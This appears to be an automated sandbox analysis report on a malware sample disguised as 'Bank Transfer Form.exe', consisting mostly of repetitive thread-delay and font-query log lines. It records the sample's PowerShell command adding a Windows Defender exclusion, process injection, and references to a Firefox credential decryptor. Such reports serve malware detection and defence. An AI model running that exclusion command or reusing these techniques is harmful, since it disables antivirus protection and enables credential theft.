Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597575	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596920	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596474	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: Bank Transfer Form.exe, 00000003.00000002.4139170776.00000000015E5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllov

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Code function: 3_2_06F39548 LdrInitializeThunk,LdrInitializeThunk,

3_2_06F39548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Memory written: C:\Users\user\Desktop\Bank Transfer Form.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Users\user\Desktop\Bank Transfer Form.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
